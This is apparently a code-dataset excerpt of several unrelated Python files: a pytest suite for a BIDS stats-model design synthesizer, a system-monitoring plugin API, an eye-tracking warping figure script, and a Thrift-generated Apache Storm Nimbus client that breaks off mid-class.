#!/usr/bin/env python """Tests for `bids_statsmodels_design_synthesizer` package.""" import pytest import subprocess as sp from pathlib import Path SYNTHESIZER = "aggregate_stats_design.py" from bids_statsmodels_design_synthesizer import aggregate_stats_design as synth_mod # from bids_statsmodels_design_synthesizer import Path(SYNTHESIZER).stem as synth_mod EXAMPLE_USER_ARGS = { "OUTPUT_TSV": "aggregated_design.tsv", "MODEL": "data/ds000003/models/model-001_smdl.json", "EVENTS_TSV": "data/ds000003/sub-01/func/sub-01_task-rhymejudgment_events.tsv", "DURATION": 320, } def test_cli_help(): with pytest.raises(sp.CalledProcessError): output = sp.check_output([SYNTHESIZER, "-h"]) with pytest.raises(sp.CalledProcessError): output = sp.check_output([SYNTHESIZER, "--non-existent"]) def test_design_aggregation_function(): synth_mod.main(EXAMPLE_USER_ARGS) def test_minimal_cli_functionality(): """ We roughly want to implement the equivalent of the following: from bids.analysis import Analysis from bids.layout import BIDSLayout layout = BIDSLayout("data/ds000003") analysis = Analysis(model="data/ds000003/models/model-001_smdl.json",layout=layout) analysis.setup() more specifically we want to reimplement this line https://github.com/bids-standard/pybids/blob/b6cd0f6787230ce976a374fbd5fce650865752a3/bids/analysis/analysis.py#L282 """ bids_dir = Path(__file__).parent / "data/ds000003" model = "model-001_smdl.json" arg_list = " " .join([f"""--{k.lower().replace("_","-")}={v}""" for k,v in EXAMPLE_USER_ARGS.items()]) cmd = f"{SYNTHESIZER} {arg_list}" output = sp.check_output(cmd.split()) @pytest.mark.xfail(reason="Container not setup for boutiques yet") def test_minimal_cli_functionality_using_boutiques(): """This might be nice to do. boutiques sets /bin/sh as the entrypoint for the contain to /bin/sh so this should be tweaked to have the conda env and the pip installed package working correctly""" boutiques_dir = Path(__file__).parent.parent / "boutiques" cmd = f""" bosh exec launch {boutiques_dir}/bids-app-bids-statsmodels-design-synthesizer.json {boutiques_dir}/invocation.json """ output = sp.check_output(cmd.split())
2.328125
2
skynet-agent/plugins/plugin_api.py
skynetera/skynet
3
5508
#!/usr/bin/env python # coding: utf-8 __author__ = 'whoami' """ @version: 1.0 @author: whoami @license: Apache Licence 2.0 @contact: <EMAIL> @site: http://www.itweet.cn @software: PyCharm Community Edition @file: plugin_api.py @time: 2015-11-28 下午1:52 """ from linux import cpu,disk,iostats,loadavg,memory,netstats,swap def get_load_info(): return loadavg.monitor() def get_cpu_status(): return cpu.monitor() def get_memory_info(): return memory.monitor() def get_swap_info(): return swap.monitor() def get_disk_info(): return disk.monitor() def get_network_info(): return netstats.monitor() def get_iostats_info(): return iostats.monitor()
1.789063
2
code/figure_warp.py
jwcarr/drift
2
5509
import numpy as np import eyekit import algorithms import core data = eyekit.io.load(core.FIXATIONS / 'sample.json') passages = eyekit.io.load(core.DATA / 'passages.json') original_sequence = data['trial_5']['fixations'] fixation_XY = np.array([fixation.xy for fixation in original_sequence], dtype=int) word_XY = np.array([word.center for word in passages['1B'].words(alphabetical_only=False)], dtype=int) start_times = np.array([i*100 for i in range(len(word_XY))], dtype=int) expected_sequence = eyekit.FixationSequence(np.column_stack([word_XY, start_times, start_times+100])) diagram = eyekit.vis.Image(1920, 1080) diagram.draw_text_block(passages['1B'], mask_text=True) diagram.draw_fixation_sequence(expected_sequence, color='#E32823', fixation_radius=6) diagram.draw_fixation_sequence(original_sequence, color='#205E84', fixation_radius=6) _, warping_path = algorithms.dynamic_time_warping(fixation_XY, word_XY) for fixation, mapped_words in zip(original_sequence, warping_path): for word_i in mapped_words: word_x, word_y = word_XY[word_i] diagram.draw_line(fixation.xy, (word_x, word_y), color='black', stroke_width=0.5, dashed=True) fig = eyekit.vis.Figure() fig.add_image(diagram) fig.set_crop_margin(2) fig.set_padding(vertical=2, horizontal=3, edge=1) fig.set_enumeration(False) fig.save(core.VISUALS / 'illustration_warp.pdf', width=83) # fig.save(core.FIGS / 'fig02_single_column.eps', width=83)
2.125
2
storm/Nimbus.py
krux/python-storm
0
5510
<reponame>krux/python-storm<filename>storm/Nimbus.py<gh_stars>0 # # Autogenerated by Thrift Compiler (0.9.0) # # DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING # # options string: py # from thrift.Thrift import TType, TMessageType, TException, TApplicationException from ttypes import * from thrift.Thrift import TProcessor from thrift.transport import TTransport from thrift.protocol import TBinaryProtocol, TProtocol try: from thrift.protocol import fastbinary except: fastbinary = None class Iface: def submitTopology(self, name, uploadedJarLocation, jsonConf, topology): """ Parameters: - name - uploadedJarLocation - jsonConf - topology """ pass def submitTopologyWithOpts(self, name, uploadedJarLocation, jsonConf, topology, options): """ Parameters: - name - uploadedJarLocation - jsonConf - topology - options """ pass def killTopology(self, name): """ Parameters: - name """ pass def killTopologyWithOpts(self, name, options): """ Parameters: - name - options """ pass def activate(self, name): """ Parameters: - name """ pass def deactivate(self, name): """ Parameters: - name """ pass def rebalance(self, name, options): """ Parameters: - name - options """ pass def beginFileUpload(self, ): pass def uploadChunk(self, location, chunk): """ Parameters: - location - chunk """ pass def finishFileUpload(self, location): """ Parameters: - location """ pass def beginFileDownload(self, file): """ Parameters: - file """ pass def downloadChunk(self, id): """ Parameters: - id """ pass def getNimbusConf(self, ): pass def getClusterInfo(self, ): pass def getTopologyInfo(self, id): """ Parameters: - id """ pass def getTopologyConf(self, id): """ Parameters: - id """ pass def getTopology(self, id): """ Parameters: - id """ pass def getUserTopology(self, id): """ Parameters: - id """ pass class Client(Iface): def __init__(self, iprot, oprot=None): self._iprot = self._oprot = iprot if oprot is not None: self._oprot = oprot self._seqid = 0 def submitTopology(self, name, uploadedJarLocation, jsonConf, topology): """ Parameters: - name - uploadedJarLocation - jsonConf - topology """ self.send_submitTopology(name, uploadedJarLocation, jsonConf, topology) self.recv_submitTopology() def send_submitTopology(self, name, uploadedJarLocation, jsonConf, topology): self._oprot.writeMessageBegin('submitTopology', TMessageType.CALL, self._seqid) args = submitTopology_args() args.name = name args.uploadedJarLocation = uploadedJarLocation args.jsonConf = jsonConf args.topology = topology args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_submitTopology(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = submitTopology_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.e is not None: raise result.e if result.ite is not None: raise result.ite return def submitTopologyWithOpts(self, name, uploadedJarLocation, jsonConf, topology, options): """ Parameters: - name - uploadedJarLocation - jsonConf - topology - options """ self.send_submitTopologyWithOpts(name, uploadedJarLocation, jsonConf, topology, options) self.recv_submitTopologyWithOpts() def send_submitTopologyWithOpts(self, name, uploadedJarLocation, jsonConf, topology, options): self._oprot.writeMessageBegin('submitTopologyWithOpts', TMessageType.CALL, self._seqid) args = submitTopologyWithOpts_args() args.name = name args.uploadedJarLocation = uploadedJarLocation args.jsonConf = jsonConf args.topology = topology args.options = options args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_submitTopologyWithOpts(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = submitTopologyWithOpts_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.e is not None: raise result.e if result.ite is not None: raise result.ite return def killTopology(self, name): """ Parameters: - name """ self.send_killTopology(name) self.recv_killTopology() def send_killTopology(self, name): self._oprot.writeMessageBegin('killTopology', TMessageType.CALL, self._seqid) args = killTopology_args() args.name = name args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_killTopology(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = killTopology_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.e is not None: raise result.e return def killTopologyWithOpts(self, name, options): """ Parameters: - name - options """ self.send_killTopologyWithOpts(name, options) self.recv_killTopologyWithOpts() def send_killTopologyWithOpts(self, name, options): self._oprot.writeMessageBegin('killTopologyWithOpts', TMessageType.CALL, self._seqid) args = killTopologyWithOpts_args() args.name = name args.options = options args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_killTopologyWithOpts(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = killTopologyWithOpts_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.e is not None: raise result.e return def activate(self, name): """ Parameters: - name """ self.send_activate(name) self.recv_activate() def send_activate(self, name): self._oprot.writeMessageBegin('activate', TMessageType.CALL, self._seqid) args = activate_args() args.name = name args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_activate(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = activate_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.e is not None: raise result.e return def deactivate(self, name): """ Parameters: - name """ self.send_deactivate(name) self.recv_deactivate() def send_deactivate(self, name): self._oprot.writeMessageBegin('deactivate', TMessageType.CALL, self._seqid) args = deactivate_args() args.name = name args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_deactivate(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = deactivate_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.e is not None: raise result.e return def rebalance(self, name, options): """ Parameters: - name - options """ self.send_rebalance(name, options) self.recv_rebalance() def send_rebalance(self, name, options): self._oprot.writeMessageBegin('rebalance', TMessageType.CALL, self._seqid) args = rebalance_args() args.name = name args.options = options args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_rebalance(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = rebalance_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.e is not None: raise result.e if result.ite is not None: raise result.ite return def beginFileUpload(self, ): self.send_beginFileUpload() return self.recv_beginFileUpload() def send_beginFileUpload(self, ): self._oprot.writeMessageBegin('beginFileUpload', TMessageType.CALL, self._seqid) args = beginFileUpload_args() args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_beginFileUpload(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = beginFileUpload_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success raise TApplicationException(TApplicationException.MISSING_RESULT, "beginFileUpload failed: unknown result"); def uploadChunk(self, location, chunk): """ Parameters: - location - chunk """ self.send_uploadChunk(location, chunk) self.recv_uploadChunk() def send_uploadChunk(self, location, chunk): self._oprot.writeMessageBegin('uploadChunk', TMessageType.CALL, self._seqid) args = uploadChunk_args() args.location = location args.chunk = chunk args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_uploadChunk(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = uploadChunk_result() result.read(self._iprot) self._iprot.readMessageEnd() return def finishFileUpload(self, location): """ Parameters: - location """ self.send_finishFileUpload(location) self.recv_finishFileUpload() def send_finishFileUpload(self, location): self._oprot.writeMessageBegin('finishFileUpload', TMessageType.CALL, self._seqid) args = finishFileUpload_args() args.location = location args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_finishFileUpload(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = finishFileUpload_result() result.read(self._iprot) self._iprot.readMessageEnd() return def beginFileDownload(self, file): """ Parameters: - file """ self.send_beginFileDownload(file) return self.recv_beginFileDownload() def send_beginFileDownload(self, file): self._oprot.writeMessageBegin('beginFileDownload', TMessageType.CALL, self._seqid) args = beginFileDownload_args() args.file = file args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_beginFileDownload(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = beginFileDownload_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success raise TApplicationException(TApplicationException.MISSING_RESULT, "beginFileDownload failed: unknown result"); def downloadChunk(self, id): """ Parameters: - id """ self.send_downloadChunk(id) return self.recv_downloadChunk() def send_downloadChunk(self, id): self._oprot.writeMessageBegin('downloadChunk', TMessageType.CALL, self._seqid) args = downloadChunk_args() args.id = id args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_downloadChunk(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = downloadChunk_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success raise TApplicationException(TApplicationException.MISSING_RESULT, "downloadChunk failed: unknown result"); def getNimbusConf(self, ): self.send_getNimbusConf() return self.recv_getNimbusConf() def send_getNimbusConf(self, ): self._oprot.writeMessageBegin('getNimbusConf', TMessageType.CALL, self._seqid) args = getNimbusConf_args() args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_getNimbusConf(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = getNimbusConf_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success raise TApplicationException(TApplicationException.MISSING_RESULT, "getNimbusConf failed: unknown result"); def getClusterInfo(self, ): self.send_getClusterInfo() return self.recv_getClusterInfo() def send_getClusterInfo(self, ): self._oprot.writeMessageBegin('getClusterInfo', TMessageType.CALL, self._seqid) args = getClusterInfo_args() args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_getClusterInfo(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = getClusterInfo_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success raise TApplicationException(TApplicationException.MISSING_RESULT, "getClusterInfo failed: unknown result"); def getTopologyInfo(self, id): """ Parameters: - id """ self.send_getTopologyInfo(id) return self.recv_getTopologyInfo() def send_getTopologyInfo(self, id): self._oprot.writeMessageBegin('getTopologyInfo', TMessageType.CALL, self._seqid) args = getTopologyInfo_args() args.id = id args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_getTopologyInfo(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = getTopologyInfo_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.e is not None: raise result.e raise TApplicationException(TApplicationException.MISSING_RESULT, "getTopologyInfo failed: unknown result"); def getTopologyConf(self, id): """ Parameters: - id """ self.send_getTopologyConf(id) return self.recv_getTopologyConf() def send_getTopologyConf(self, id): self._oprot.writeMessageBegin('getTopologyConf', TMessageType.CALL, self._seqid) args = getTopologyConf_args() args.id = id args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_getTopologyConf(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = getTopologyConf_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.e is not None: raise result.e raise TApplicationException(TApplicationException.MISSING_RESULT, "getTopologyConf failed: unknown result"); def getTopology(self, id): """ Parameters: - id """ self.send_getTopology(id) return self.recv_getTopology() def send_getTopology(self, id): self._oprot.writeMessageBegin('getTopology', TMessageType.CALL, self._seqid) args = getTopology_args() args.id = id args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_getTopology(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = getTopology_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.e is not None: raise result.e raise TApplicationException(TApplicationException.MISSING_RESULT, "getTopology failed: unknown result"); def getUserTopology(self, id): """ Parameters: - id """ self.send_getUserTopology(id) return self.recv_getUserTopology() def send_getUserTopology(self, id): self._oprot.writeMessageBegin('getUserTopology', TMessageType.CALL, self._seqid) args = getUserTopology_args() args.id = id args.write(self._oprot) self._oprot.writeMessageEnd() self._oprot.trans.flush() def recv_getUserTopology(self, ): (fname, mtype, rseqid) = self._iprot.readMessageBegin() if mtype == TMessageType.EXCEPTION: x = TApplicationException() x.read(self._iprot) self._iprot.readMessageEnd() raise x result = getUserTopology_result() result.read(self._iprot) self._iprot.readMessageEnd() if result.success is not None: return result.success if result.e is not None: raise result.e raise TApplicationException(TApplicationException.MISSING_RESULT, "getUserTopology failed: unknown result"); class Processor(Iface, TProcessor): def __init__(self, handler): self._handler = handler self._processMap = {} self._processMap["submitTopology"] = Processor.process_submitTopology self._processMap["submitTopologyWithOpts"] = Processor.process_submitTopologyWithOpts self._processMap["killTopology"] = Processor.process_killTopology self._processMap["killTopologyWithOpts"] = Processor.process_killTopologyWithOpts self._processMap["activate"] = Processor.process_activate self._processMap["deactivate"] = Processor.process_deactivate self._processMap["rebalance"] = Processor.process_rebalance self._processMap["beginFileUpload"] = Processor.process_beginFileUpload self._processMap["uploadChunk"] = Processor.process_uploadChunk self._processMap["finishFileUpload"] = Processor.process_finishFileUpload self._processMap["beginFileDownload"] = Processor.process_beginFileDownload self._processMap["downloadChunk"] = Processor.process_downloadChunk self._processMap["getNimbusConf"] = Processor.process_getNimbusConf self._processMap["getClusterInfo"] = Processor.process_getClusterInfo self._processMap["getTopologyInfo"] = Processor.process_getTopologyInfo self._processMap["getTopologyConf"] = Processor.process_getTopologyConf self._processMap["getTopology"] = Processor.process_getTopology self._processMap["getUserTopology"] = Processor.process_getUserTopology def process(self, iprot, oprot): (name, type, seqid) = iprot.readMessageBegin() if name not in self._processMap: iprot.skip(TType.STRUCT) iprot.readMessageEnd() x = TApplicationException(TApplicationException.UNKNOWN_METHOD, 'Unknown function %s' % (name)) oprot.writeMessageBegin(name, TMessageType.EXCEPTION, seqid) x.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() return else: self._processMap[name](self, seqid, iprot, oprot) return True def process_submitTopology(self, seqid, iprot, oprot): args = submitTopology_args() args.read(iprot) iprot.readMessageEnd() result = submitTopology_result() try: self._handler.submitTopology(args.name, args.uploadedJarLocation, args.jsonConf, args.topology) except AlreadyAliveException as e: result.e = e except InvalidTopologyException as ite: result.ite = ite oprot.writeMessageBegin("submitTopology", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_submitTopologyWithOpts(self, seqid, iprot, oprot): args = submitTopologyWithOpts_args() args.read(iprot) iprot.readMessageEnd() result = submitTopologyWithOpts_result() try: self._handler.submitTopologyWithOpts(args.name, args.uploadedJarLocation, args.jsonConf, args.topology, args.options) except AlreadyAliveException as e: result.e = e except InvalidTopologyException as ite: result.ite = ite oprot.writeMessageBegin("submitTopologyWithOpts", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_killTopology(self, seqid, iprot, oprot): args = killTopology_args() args.read(iprot) iprot.readMessageEnd() result = killTopology_result() try: self._handler.killTopology(args.name) except NotAliveException as e: result.e = e oprot.writeMessageBegin("killTopology", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_killTopologyWithOpts(self, seqid, iprot, oprot): args = killTopologyWithOpts_args() args.read(iprot) iprot.readMessageEnd() result = killTopologyWithOpts_result() try: self._handler.killTopologyWithOpts(args.name, args.options) except NotAliveException as e: result.e = e oprot.writeMessageBegin("killTopologyWithOpts", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_activate(self, seqid, iprot, oprot): args = activate_args() args.read(iprot) iprot.readMessageEnd() result = activate_result() try: self._handler.activate(args.name) except NotAliveException as e: result.e = e oprot.writeMessageBegin("activate", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_deactivate(self, seqid, iprot, oprot): args = deactivate_args() args.read(iprot) iprot.readMessageEnd() result = deactivate_result() try: self._handler.deactivate(args.name) except NotAliveException as e: result.e = e oprot.writeMessageBegin("deactivate", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_rebalance(self, seqid, iprot, oprot): args = rebalance_args() args.read(iprot) iprot.readMessageEnd() result = rebalance_result() try: self._handler.rebalance(args.name, args.options) except NotAliveException as e: result.e = e except InvalidTopologyException as ite: result.ite = ite oprot.writeMessageBegin("rebalance", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_beginFileUpload(self, seqid, iprot, oprot): args = beginFileUpload_args() args.read(iprot) iprot.readMessageEnd() result = beginFileUpload_result() result.success = self._handler.beginFileUpload() oprot.writeMessageBegin("beginFileUpload", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_uploadChunk(self, seqid, iprot, oprot): args = uploadChunk_args() args.read(iprot) iprot.readMessageEnd() result = uploadChunk_result() self._handler.uploadChunk(args.location, args.chunk) oprot.writeMessageBegin("uploadChunk", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_finishFileUpload(self, seqid, iprot, oprot): args = finishFileUpload_args() args.read(iprot) iprot.readMessageEnd() result = finishFileUpload_result() self._handler.finishFileUpload(args.location) oprot.writeMessageBegin("finishFileUpload", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_beginFileDownload(self, seqid, iprot, oprot): args = beginFileDownload_args() args.read(iprot) iprot.readMessageEnd() result = beginFileDownload_result() result.success = self._handler.beginFileDownload(args.file) oprot.writeMessageBegin("beginFileDownload", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_downloadChunk(self, seqid, iprot, oprot): args = downloadChunk_args() args.read(iprot) iprot.readMessageEnd() result = downloadChunk_result() result.success = self._handler.downloadChunk(args.id) oprot.writeMessageBegin("downloadChunk", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_getNimbusConf(self, seqid, iprot, oprot): args = getNimbusConf_args() args.read(iprot) iprot.readMessageEnd() result = getNimbusConf_result() result.success = self._handler.getNimbusConf() oprot.writeMessageBegin("getNimbusConf", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_getClusterInfo(self, seqid, iprot, oprot): args = getClusterInfo_args() args.read(iprot) iprot.readMessageEnd() result = getClusterInfo_result() result.success = self._handler.getClusterInfo() oprot.writeMessageBegin("getClusterInfo", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_getTopologyInfo(self, seqid, iprot, oprot): args = getTopologyInfo_args() args.read(iprot) iprot.readMessageEnd() result = getTopologyInfo_result() try: result.success = self._handler.getTopologyInfo(args.id) except NotAliveException as e: result.e = e oprot.writeMessageBegin("getTopologyInfo", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_getTopologyConf(self, seqid, iprot, oprot): args = getTopologyConf_args() args.read(iprot) iprot.readMessageEnd() result = getTopologyConf_result() try: result.success = self._handler.getTopologyConf(args.id) except NotAliveException as e: result.e = e oprot.writeMessageBegin("getTopologyConf", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_getTopology(self, seqid, iprot, oprot): args = getTopology_args() args.read(iprot) iprot.readMessageEnd() result = getTopology_result() try: result.success = self._handler.getTopology(args.id) except NotAliveException as e: result.e = e oprot.writeMessageBegin("getTopology", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() def process_getUserTopology(self, seqid, iprot, oprot): args = getUserTopology_args() args.read(iprot) iprot.readMessageEnd() result = getUserTopology_result() try: result.success = self._handler.getUserTopology(args.id) except NotAliveException as e: result.e = e oprot.writeMessageBegin("getUserTopology", TMessageType.REPLY, seqid) result.write(oprot) oprot.writeMessageEnd() oprot.trans.flush() # HELPER FUNCTIONS AND STRUCTURES class submitTopology_args: """ Attributes: - name - uploadedJarLocation - jsonConf - topology """ thrift_spec = ( None, # 0 (1, TType.STRING, 'name', None, None, ), # 1 (2, TType.STRING, 'uploadedJarLocation', None, None, ), # 2 (3, TType.STRING, 'jsonConf', None, None, ), # 3 (4, TType.STRUCT, 'topology', (StormTopology, StormTopology.thrift_spec), None, ), # 4 ) def __init__(self, name=None, uploadedJarLocation=None, jsonConf=None, topology=None,): self.name = name self.uploadedJarLocation = uploadedJarLocation self.jsonConf = jsonConf self.topology = topology def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRING: self.name = iprot.readString(); else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRING: self.uploadedJarLocation = iprot.readString(); else: iprot.skip(ftype) elif fid == 3: if ftype == TType.STRING: self.jsonConf = iprot.readString(); else: iprot.skip(ftype) elif fid == 4: if ftype == TType.STRUCT: self.topology = StormTopology() self.topology.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('submitTopology_args') if self.name is not None: oprot.writeFieldBegin('name', TType.STRING, 1) oprot.writeString(self.name) oprot.writeFieldEnd() if self.uploadedJarLocation is not None: oprot.writeFieldBegin('uploadedJarLocation', TType.STRING, 2) oprot.writeString(self.uploadedJarLocation) oprot.writeFieldEnd() if self.jsonConf is not None: oprot.writeFieldBegin('jsonConf', TType.STRING, 3) oprot.writeString(self.jsonConf) oprot.writeFieldEnd() if self.topology is not None: oprot.writeFieldBegin('topology', TType.STRUCT, 4) self.topology.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class submitTopology_result: """ Attributes: - e - ite """ thrift_spec = ( None, # 0 (1, TType.STRUCT, 'e', (AlreadyAliveException, AlreadyAliveException.thrift_spec), None, ), # 1 (2, TType.STRUCT, 'ite', (InvalidTopologyException, InvalidTopologyException.thrift_spec), None, ), # 2 ) def __init__(self, e=None, ite=None,): self.e = e self.ite = ite def read(self, iprot): if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None: fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec)) return iprot.readStructBegin() while True: (fname, ftype, fid) = iprot.readFieldBegin() if ftype == TType.STOP: break if fid == 1: if ftype == TType.STRUCT: self.e = AlreadyAliveException() self.e.read(iprot) else: iprot.skip(ftype) elif fid == 2: if ftype == TType.STRUCT: self.ite = InvalidTopologyException() self.ite.read(iprot) else: iprot.skip(ftype) else: iprot.skip(ftype) iprot.readFieldEnd() iprot.readStructEnd() def write(self, oprot): if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None: oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec))) return oprot.writeStructBegin('submitTopology_result') if self.e is not None: oprot.writeFieldBegin('e', TType.STRUCT, 1) self.e.write(oprot) oprot.writeFieldEnd() if self.ite is not None: oprot.writeFieldBegin('ite', TType.STRUCT, 2) self.ite.write(oprot) oprot.writeFieldEnd() oprot.writeFieldStop() oprot.writeStructEnd() def validate(self): return def __repr__(self): L = ['%s=%r' % (key, value) for key, value in self.__dict__.iteritems()] return '%s(%s)' % (self.__class__.__name__, ', '.join(L)) def __eq__(self, other): return isinstance(other, self.__class__) and self.__dict__ == other.__dict__ def __ne__(self, other): return not (self == other) class submitTopologyWithOpts_args: """ Attributes: - name - uploadedJarLocation - jsonConf - topology - options """ thrift_spec = ( None, # 0 (1, TType.STRING, 'name', None, None, ), # 1 (2, TType.STRING, 'uploadedJarLocation', None, None, ), # 2 (3, 